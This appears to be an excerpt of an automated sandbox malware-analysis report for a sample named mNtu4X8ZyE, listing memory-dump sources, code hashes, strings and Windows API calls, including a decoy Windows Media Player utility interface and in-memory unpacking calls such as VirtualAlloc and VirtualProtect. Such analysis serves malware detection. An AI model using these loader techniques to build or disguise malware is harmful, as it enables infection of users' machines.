                                                                                      • Opcode ID: ef6139f2aca061be2cddc88f17184936ffd241f444024dc4d897b8b57bbd0a9c
                                                                                      • Instruction ID: be15ee6c4670d93ef720ef993db76e02bb42d258af6f38be0517883d00358577
                                                                                      • Opcode Fuzzy Hash: ef6139f2aca061be2cddc88f17184936ffd241f444024dc4d897b8b57bbd0a9c
                                                                                      • Instruction Fuzzy Hash: 3971B2716183019FD318DFA8D449A2FB7E1ABD4314F408D2DF49A9B298D778D909CF82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5~$PK
                                                                                      • API String ID: 0-1089616948
                                                                                      • Opcode ID: 8b81b203fa51f8662998a0e189cc996ca1f84b5d6fb8c8cd66eb41d5b8c1ac9b
                                                                                      • Instruction ID: 983533bde85d5800134d8d259eeb913ea1fc819b1f2a716891dca3b5294eaeae
                                                                                      • Opcode Fuzzy Hash: 8b81b203fa51f8662998a0e189cc996ca1f84b5d6fb8c8cd66eb41d5b8c1ac9b
                                                                                      • Instruction Fuzzy Hash: C232E671A283028BE728DEE8A9C592E76D2ABF0344F14092DF445DB36DDB74C945CB93
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: B=$}r
                                                                                      • API String ID: 0-4253951455
                                                                                      • Opcode ID: 9a8714f60742fb2f3b1e2a78ede030c84d5c103d4bbae9b4e5573fab1c25ac96
                                                                                      • Instruction ID: 1be2b775a8ca116b780d4924f490d45e530202997254a6452e894f28dd580137
                                                                                      • Opcode Fuzzy Hash: 9a8714f60742fb2f3b1e2a78ede030c84d5c103d4bbae9b4e5573fab1c25ac96
                                                                                      • Instruction Fuzzy Hash: 7761C2B15083928BD748DF24E19952ABBF0FBD4714F404E2DF4A19A291D3B4DA5CCB93
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: B=$}r
                                                                                      • API String ID: 0-4253951455
                                                                                      • Opcode ID: 9a8714f60742fb2f3b1e2a78ede030c84d5c103d4bbae9b4e5573fab1c25ac96
                                                                                      • Instruction ID: 93f834560520215d2c84e51db001b83a0a65d991c19faff75f7b4af675d0c1f7
                                                                                      • Opcode Fuzzy Hash: 9a8714f60742fb2f3b1e2a78ede030c84d5c103d4bbae9b4e5573fab1c25ac96
                                                                                      • Instruction Fuzzy Hash: 7E61E1B25083838BD758DF28D19951ABBE0FBD4B14F404E2DF4A19A291D3B4DA5CCB93
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: B=$}r
                                                                                      • API String ID: 0-4253951455
                                                                                      • Opcode ID: 642efa90a1a4a676d635c2900358808c2b1882d141a76647cec1752dd12e807e
                                                                                      • Instruction ID: eae2317f2f15e931b1fc4bb04860d9b060edc71787216b98d8734f69eb1a3c05
                                                                                      • Opcode Fuzzy Hash: 642efa90a1a4a676d635c2900358808c2b1882d141a76647cec1752dd12e807e
                                                                                      • Instruction Fuzzy Hash: 5551B1B15083938BD758DF24E15911ABBF0BBD4B14F104E1DF4A29A290D3B4DA5CCB93
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: B=$}r
                                                                                      • API String ID: 0-4253951455
                                                                                      • Opcode ID: 642efa90a1a4a676d635c2900358808c2b1882d141a76647cec1752dd12e807e
                                                                                      • Instruction ID: 31a79886a249f0c9f3b486bf8db41925c2cf55fa981396ec2239310cecdd1c10
                                                                                      • Opcode Fuzzy Hash: 642efa90a1a4a676d635c2900358808c2b1882d141a76647cec1752dd12e807e
                                                                                      • Instruction Fuzzy Hash: B851B0B15083838BD758DF24D19951ABBE1FBD4B04F404E2DF4A29A290E3B4DA5CCB93
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }r$}r
                                                                                      • API String ID: 0-495469283
                                                                                      • Opcode ID: 6c7309ee0626a89c0661319d5c1751ec5d54d9f921b1d5b87d678b6d7bf1c6b7
                                                                                      • Instruction ID: e992d882d4b88910d2cd6de52d34bb9144c0088795dc2375e4d073ed018b6d66
                                                                                      • Opcode Fuzzy Hash: 6c7309ee0626a89c0661319d5c1751ec5d54d9f921b1d5b87d678b6d7bf1c6b7
                                                                                      • Instruction Fuzzy Hash: 6751A171509351AFD748DF29D19A01BBBF0ABC4B64F10C91DF4AA8B290D378D958DF42
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }r$}r
                                                                                      • API String ID: 0-495469283
                                                                                      • Opcode ID: 6c7309ee0626a89c0661319d5c1751ec5d54d9f921b1d5b87d678b6d7bf1c6b7
                                                                                      • Instruction ID: f96b9d3076ba42552d461d603279dca4bb3b8145b03185b350291b2e4d709f59
                                                                                      • Opcode Fuzzy Hash: 6c7309ee0626a89c0661319d5c1751ec5d54d9f921b1d5b87d678b6d7bf1c6b7
                                                                                      • Instruction Fuzzy Hash: 3951B171509302AFD748DF29C19A41BBBE0EBC4B64F10C82DF4AA8B290D378D958DF42
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }r$}r
                                                                                      • API String ID: 0-495469283
                                                                                      • Opcode ID: 6a3ea7fdc01b4fab83cd90332544e011179a86356ed67bb063007a8bde9b39db
                                                                                      • Instruction ID: 3ad6ffb8e4b6c2154a1d8c303b3ce5e7e66a2f44bec4aba4e8e7d430c209fc08
                                                                                      • Opcode Fuzzy Hash: 6a3ea7fdc01b4fab83cd90332544e011179a86356ed67bb063007a8bde9b39db
                                                                                      • Instruction Fuzzy Hash: DF51B07150D351AFD748CF29C19A11BBBE0ABC4B64F10C82DF4AA8B290D378D958DF42
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }r$}r
                                                                                      • API String ID: 0-495469283
                                                                                      • Opcode ID: 6a3ea7fdc01b4fab83cd90332544e011179a86356ed67bb063007a8bde9b39db
                                                                                      • Instruction ID: 147ce61eccc3e2c88aa5c82456b930807636a741a2bcca9d1c9847eac006639d
                                                                                      • Opcode Fuzzy Hash: 6a3ea7fdc01b4fab83cd90332544e011179a86356ed67bb063007a8bde9b39db
                                                                                      • Instruction Fuzzy Hash: 5A51BE7150D352AFD748CF29C19A51ABBE0ABC4B64F10C82DE4AA8B294D378D958DF42
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 12
                                                                                      • API String ID: 0-2589614596
                                                                                      • Opcode ID: 6a48bf488bc67dc7bd7a99e3bef7bb2f2f0d0d6b2c1e394c0071dcaa3eb7a98b
                                                                                      • Instruction ID: 4fc091b3124243a2ca8ad4c7695ca7d62340d5ae432b7a37d9ed5a26fffc73c1
                                                                                      • Opcode Fuzzy Hash: 6a48bf488bc67dc7bd7a99e3bef7bb2f2f0d0d6b2c1e394c0071dcaa3eb7a98b
                                                                                      • Instruction Fuzzy Hash: 0B51E130B01201CBD728AB69B89C73E37E6AF94300F504C2EE905DB381EF65DC959B96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }r
                                                                                      • API String ID: 0-1698891092
                                                                                      • Opcode ID: 6a74d2feb69e97d8a019e50bf5ff94201503b93b67f6a4a542c210167751f52b
                                                                                      • Instruction ID: 8e0b83bc115079fdd7f307f15fc4e166697ce650d878497369cbc4fec89f5442
                                                                                      • Opcode Fuzzy Hash: 6a74d2feb69e97d8a019e50bf5ff94201503b93b67f6a4a542c210167751f52b
                                                                                      • Instruction Fuzzy Hash: E331E2B15083928BD758DF24E09912AB7F0BFD4614F104E2DF4A196280D3B4DA5CCBA3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }r
                                                                                      • API String ID: 0-1698891092
                                                                                      • Opcode ID: 6a74d2feb69e97d8a019e50bf5ff94201503b93b67f6a4a542c210167751f52b
                                                                                      • Instruction ID: d21e3cc8c3d72a11fce6d3ea504356cf2d06a1ecf45d1eebfb49e8021ade2565
                                                                                      • Opcode Fuzzy Hash: 6a74d2feb69e97d8a019e50bf5ff94201503b93b67f6a4a542c210167751f52b
                                                                                      • Instruction Fuzzy Hash: 4F3102B15083838BD758CF24D09511AB7E0FBD4610F504E2DF4A196280D3B4DA5CCBA3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                                                                      • Instruction ID: 2fbffbd10becf9a82bedf00c531dcaa39b0bac348b46785592f8b473fd2ff02e
                                                                                      • Opcode Fuzzy Hash: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                                                                      • Instruction Fuzzy Hash: 83F1E6B4A11209EFDB14CF94C990EAEB7F5FF58304F208558E906AB349D775EA81CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                      • Instruction ID: ab00606e138d7b27682b00f2fd1e3b7c6f8ed689277ad42462bc4bb99235f69f
                                                                                      • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                      • Instruction Fuzzy Hash: 7731B136A1434A8FC710DF58C4C1D26B3E4FF98318F05096DE99587316D334EA868B91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                      • Instruction Fuzzy Hash:
                                                                                      APIs
                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401D96
                                                                                        • Part of subcall function 00401F90: FindWindowA.USER32(WMPlayerApp,00000000), ref: 00401F97
                                                                                      • DestroyWindow.USER32(?), ref: 00401D9D
                                                                                      • GetSystemMenu.USER32(?,00000000), ref: 00401DA8
                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00401DC0
                                                                                      • AppendMenuA.USER32(00000000,00000000,00000005,About...), ref: 00401DCC
                                                                                      • CreateWindowExA.USER32(00000000,Button,&Show Window,50000000,00000005,00000005,0000007D,00000019,?,00000002,00000000,00000000), ref: 00401DF8
                                                                                      • CreateWindowExA.USER32(00000000,Button,&Hide Window,50000000,00000087,00000005,0000007D,00000019,?,00000003,00000000,00000000), ref: 00401E27
                                                                                      • CreateWindowExA.USER32(00000000,Edit,Windows Media Player,50800000,0000000F,0000002D,000000EB,00000019,?,00000001,00000000,00000000), ref: 00401E56
                                                                                      • CreateWindowExA.USER32(00000000,Button,&Change Caption,50000000,00000048,0000004E,0000007D,00000019,?,00000004,00000000,00000000), ref: 00401E81
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFB
                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00401F0D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1305693753.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1305662841.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305718639.0000000000405000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000407000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000474000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Create$Menu$Append$DestroyFindMessagePostProcQuitShowSystem
                                                                                      • String ID: &Change Caption$&Hide Window$&Show Window$About...$Button$Edit$Windows Media Player
                                                                                      • API String ID: 1675743168-3498740803
                                                                                      • Opcode ID: 6fa5b30cb9d90c5671a906c00b49d1a349abe0e32d26c551bf39c42dfad87899
                                                                                      • Instruction ID: d2c89a25cf38dd3cc98bce7da6c1abaab37f22b51a640bf9a67e858da95faab1
                                                                                      • Opcode Fuzzy Hash: 6fa5b30cb9d90c5671a906c00b49d1a349abe0e32d26c551bf39c42dfad87899
                                                                                      • Instruction Fuzzy Hash: 43416271384705BBF630A7649D4AF6B3698EB44F15F204437F701BA2E1D6F9A8408BAD
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1305693753.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1305662841.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305718639.0000000000405000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000407000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000474000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                      • String ID:
                                                                                      • API String ID: 801014965-0
                                                                                      • Opcode ID: 6ec102433b06512b8c0474839b6dd368cc5f6bc9c2e1b5937cc38a74b614f200
                                                                                      • Instruction ID: 87e11df5f4ae46379268185e5a3862cdd04542f6cf5212e8f2ca647c65b29d7f
                                                                                      • Opcode Fuzzy Hash: 6ec102433b06512b8c0474839b6dd368cc5f6bc9c2e1b5937cc38a74b614f200
                                                                                      • Instruction Fuzzy Hash: EB415DB19016449FDB249FA4DE49AAA7BB8FB09710F20017FE952B72E1C7B84940CF58
                                                                                      APIs
                                                                                      • SetLastError.KERNEL32(0000007F), ref: 026114DB
                                                                                      • SetLastError.KERNEL32(0000007F), ref: 02611507
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306220984.0000000002611000.00000020.00001000.00020000.00000000.sdmp, Offset: 02611000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2611000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1452528299-0
                                                                                      • Opcode ID: a996b79ec3766b9bd47e34c6a6b20b7b5d723e0e8a5c610fcdd4f07667b94ab1
                                                                                      • Instruction ID: f97805c29c9a9cd389c43873e4458beb253c77025ee50507e74f202e10da66bd
                                                                                      • Opcode Fuzzy Hash: a996b79ec3766b9bd47e34c6a6b20b7b5d723e0e8a5c610fcdd4f07667b94ab1
                                                                                      • Instruction Fuzzy Hash: 05710574E04109EFDB08DF94C590BADB7B2FF49304F288599E91AAB341D735AA81CF94
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?), ref: 0040108C
                                                                                      • DestroyWindow.USER32(?), ref: 0040109C
                                                                                      • SetDlgItemTextA.USER32(?,000003E8,This program was created in using pure Win32 API (in C++). The purpose of this program is to save both screen memory and taskbar space by hiding the Windows Media Player Window.), ref: 004010B6
                                                                                      • DestroyWindow.USER32(?), ref: 004010E0
                                                                                      Strings
                                                                                      • This program was created in using pure Win32 API (in C++). The purpose of this program is to save both screen memory and taskbar space by hiding the Windows Media Player Window., xrefs: 004010AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1305693753.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1305662841.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305718639.0000000000405000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000407000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000474000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyWindow$ItemText
                                                                                      • String ID: This program was created in using pure Win32 API (in C++). The purpose of this program is to save both screen memory and taskbar space by hiding the Windows Media Player Window.
                                                                                      • API String ID: 396529852-1331625695
                                                                                      • Opcode ID: a61dc5f83ef90b811d585fcc311af718773135b45cb18a34e47a048bdf587a9a
                                                                                      • Instruction ID: b100099e501738790042682215e8a6d7cad033c4a8bb43f03221d718276c4884
                                                                                      • Opcode Fuzzy Hash: a61dc5f83ef90b811d585fcc311af718773135b45cb18a34e47a048bdf587a9a
                                                                                      • Instruction Fuzzy Hash: 0DF0AF322142406FC7148B70DA8C92B72D4EBA9701F41CC3AF182E6AE4D73DCC90EB59
                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02612468
                                                                                      • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 026124B2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306220984.0000000002611000.00000020.00001000.00020000.00000000.sdmp, Offset: 02611000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2611000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID: @
                                                                                      • API String ID: 544645111-2766056989
                                                                                      • Opcode ID: 758b09b4f4b188b822678825a5f47361f6559773a8ae6037602e4fef26b8868d
                                                                                      • Instruction ID: a8218d21f59b1a2d2eac663698611153b811e34491e9f49eeb7d638025caf2ad
                                                                                      • Opcode Fuzzy Hash: 758b09b4f4b188b822678825a5f47361f6559773a8ae6037602e4fef26b8868d
                                                                                      • Instruction Fuzzy Hash: 782107B0E00218EFDF14CF98C991BADBBB5BF44304F288589DD06AB340C334AA91DB51
                                                                                      APIs
                                                                                      • GetModuleHandleExA.KERNEL32(00000000,kernel32.dll), ref: 004015A3
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00000000,kernel32.dll), ref: 004015BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1305693753.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1305662841.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305718639.0000000000405000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000407000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000474000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHandleModuleVirtual
                                                                                      • String ID: kernel32.dll
                                                                                      • API String ID: 2270936652-1793498882
                                                                                      • Opcode ID: 5bf35002c93f4facc3e081f7e865f0f685930981354593ef6d5b8ce1566f61f9
                                                                                      • Instruction ID: bb32f66759e984ad9a82917001f02bd0d3e76ee526862dde03f538f9ec23572d
                                                                                      • Opcode Fuzzy Hash: 5bf35002c93f4facc3e081f7e865f0f685930981354593ef6d5b8ce1566f61f9
                                                                                      • Instruction Fuzzy Hash: BCF0A77230132427C614DA555C05BAF6699FBC4B61F14043EFA07F72C0CB749904D3A9
                                                                                      APIs
                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 026121F9
                                                                                      • SetLastError.KERNEL32(0000007E), ref: 0261223B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306220984.0000000002611000.00000020.00001000.00020000.00000000.sdmp, Offset: 02611000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2611000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 4100373531-0
                                                                                      • Opcode ID: 0ba5735d690fff462cf55554bad8746523d3fceeb9882938484c6c1b25645b03
                                                                                      • Instruction ID: c89c90dd665e6c5f9027c14d33acae50c6cd05aef727d9da5631533e23774be0
